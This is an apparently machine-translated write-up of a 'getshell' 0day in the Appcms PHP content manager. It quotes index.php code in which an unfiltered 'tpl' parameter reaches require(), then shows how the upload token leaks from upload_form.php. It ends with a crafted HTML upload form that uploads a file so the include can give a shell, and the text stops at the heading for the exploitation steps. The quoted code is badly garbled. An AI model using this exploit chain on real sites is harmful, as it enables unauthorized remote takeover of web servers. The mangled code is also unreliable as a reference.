Appcms contains Getshell 0day

0x01 Code Analysis

See index.php file

$TPL=isset($_get[' TPL ']?$_get[' TPL ']: ' Index ';//2.1) Judging classification binding templateif(intval($cid) > 0) {    $ncate=isset($ccategories[$cid])?$ccategories[$cid]:‘‘; if($ncate= = ") die(' classification does not exist '); if($ncate[' Tpl_listvar ']! = ') {//The list page is not empty, the current page is larger than the first page, and the list page template is replaced        $TPL=substr($ncate[' Tpl_listvar '], 0,Stripos($ncate[' Tpl_listvar '], '. ')); }     if($ncate[' Tpl_index ']! = ') {//cover page is not empty, the current page is the first page, replaced by a cover sheet template        if($p= = 1)$TPL=substr($ncate[' Tpl_index '], 0,Stripos($ncate[' Tpl_index '], '. ')); } } //2.2) Judging categories Under Content page template, information details page, application details page, App history version pageif($TPL= = ' Content_app ') {    $c-Update_vistor ($id, 0); $con=$c-Get_content ($id, 0); if(!isset($con[' app_id '])) { die(' Information does not exist '); }} ElseIf($TPL= = ' Content_app_history ') {    $c-Update_vistor ($id, 0); $con=$c-Get_content ($id, 0); //exit (Print_r ($con [' history ')];    foreach($con[' History '] as $a) {//determine current app version information        if($a[' history_id '] = =$hid) {            $history=$a; //Print_r ($history);            Continue; }     }     if(!isset($history)) die(' Historical version data does not exist ');} ElseIf($TPL= = ' Content_info ') {    $c-Update_vistor ($id, 1); $con=$c-Get_content ($id, 1); if(!isset($con[' info_id '])) { die(' Information does not exist '); }} if(isset($con) &&$ccategories[$con[' last_cate_id '] [' tpl_content ']! = ')$TPL=$ccategories[$con[' last_cate_id '] [' Tpl_content '];//content page top-level category ID judging, navigation bar useif(isset($con)) {    $top=$c-Cate_father ($con[' last_cate_id ']); $topid=$top[0] [' cate_id '];} //3) Combination template page Path$from _mobile=TEMPLATE;if(defined(' Content_mobile ') && content_mobile = = 1) {//Adaptive WAP Browsing    if($c-From_mobile ()) {                $from _mobile=defined(' Wap_tpl ') && wap_tpl? WAP_TPL:m; } } if(defined(' Wap_url ') && wap_url! = ' && '/http '.$_server[' http_host '] = = Wap_url) {//WAP Standalone Domain browsing    $from _mobile=Wap_tpl;} if(substr($_server[' Http_host '], 0, 4) = = ' Mkt. ') {//Mobile Client    $from _mobile= "MKT";} if(substr($TPL,strlen($TPL) -4, 4) = = '. php ') {    $tmp _file= '/templates/'.$from _mobile. ‘/‘ .$TPL;} Else {    $tmp _file= '/templates/'.$from _mobile. ‘/‘ .$TPL. '. php ';} if(!file_exists(dirname(__file__) .$tmp _file)) die(' template page does not exist '.$tmp _file);require(dirname(__file__) .$tmp _file);/** * Other action functions start*/

You can see that the TPL passed in without any filtering, directly contained.

But this CMS does not directly upload the place, the front desk does not have what function. But how do you take advantage of this inclusion? Is it the only one that contains the log god horse? That's too much of a chicken. We should find a way to Getshell.

See/upload/upload_file.php

$page[' get '] =$_get;$page[' post '] =$_post;$dbm=NewDb_mysql ();$params=$page[' Get '] [' Params '];/** * $params =json_encode (UrlDecode ($params)); * Die (' <script> alert ('. $params. '); </script> '); */$params=Preg_replace(' ~ (\\\ ') ~ ', ' "',$params);$json _params= Json_decode ($params);//1. Verifying Request Security$verify=isset($page[' Get '] [' V '])?$page[' Get '] [' V ']: ';if($verify= = ") die(' <script>alert ("No Access 001");</script> ');$verify= Helper:: Decrypt ($verify,upload_key);$GSC=substr($verify, 0,strlen(Upload_code));if($GSC! = Upload_code) die(' <script>alert (' No Access 002 ').$GSC. ' ");</script> ');if(!Preg_match(' ~ (\d{10}) ~ ',substr($verify,strlen(Upload_code)))) die(' <script>alert (' No Access 003 ').$verify. ' ");</script> ');//2. Receive image upload$save _path= '. '. Upload_path.Date(' y/m/d '). ‘/‘;$file _name=Strtolower($_files[' File '] [' Name ']);if(strstr($file _name, '. apk ')) {    $save _path= '. '. (defined(' upload_path_apk ')? upload_path_apk: '/apk/').Date(' y/m/d '). ‘/‘;}$upload _config=Array();$upload _config[' savepath '] =$save _path;//Picture Save Path

Through $verify to verify whether can upload, how to get $verify it. See upload_form.php

<?PHPrequire_once(dirname(__file__)." /.. /core/init.php "); $upload _server= Site_path. " upload/"; //uploading security validation strings    $verify=helper::encrypt (Upload_code.Strtotime(Date(' y-m-d h:i:s ')),Upload_key); $params=$_get[' Params ']; $params=Preg_replace(' ~ (\\\ ') ~ ', ' "',$params); $json=json_decode ($params);?>........<body> <form action= ' <?php Echo ($upload _server);? >upload_file.php?params=<?php Echo UrlEncode ($params);? >&v=<?php Echo ($verify);? > ' id= ' form "name=" form "enctype=" Multipart/form-data "method=" post "target=" Hidden_frame "> <aclass= "Input-file" > Upload <input type= "file" id= "file" name= "file" size= "1" style= "width:70px;cursor:default;height : 25px;line-height:25px; " ></a> <iframe name= "Hidden_frame" id= "Hidden_frame" frameborder= "no" border= "0″marginwidth=" 0″marginhe ight= "0" scrolling= "no" allowtransparency= "yes" ></iframe> </form> </body>
The direct echo out of his value, so it's good to run. Our local construction uploads the form.
 
</HTML><Head></Head><Body>     <formAction= "Http://127.0.0.1/appcms/upload/upload_file.php?params=&v=tHtAtQScLEskxnAynNEomxsWH"ID= "form"name= "form"enctype= "Multipart/form-data"Method= "POST"Target= "Hidden_frame"><inputtype= ' file 'name= ' file '/><inputtype= ' Submit 'value= ' UploadFile '/><form> </Body></HTML>
Then it can be uploaded, because there is a callback function, so the capture can see the path.
0X02 Utilization Process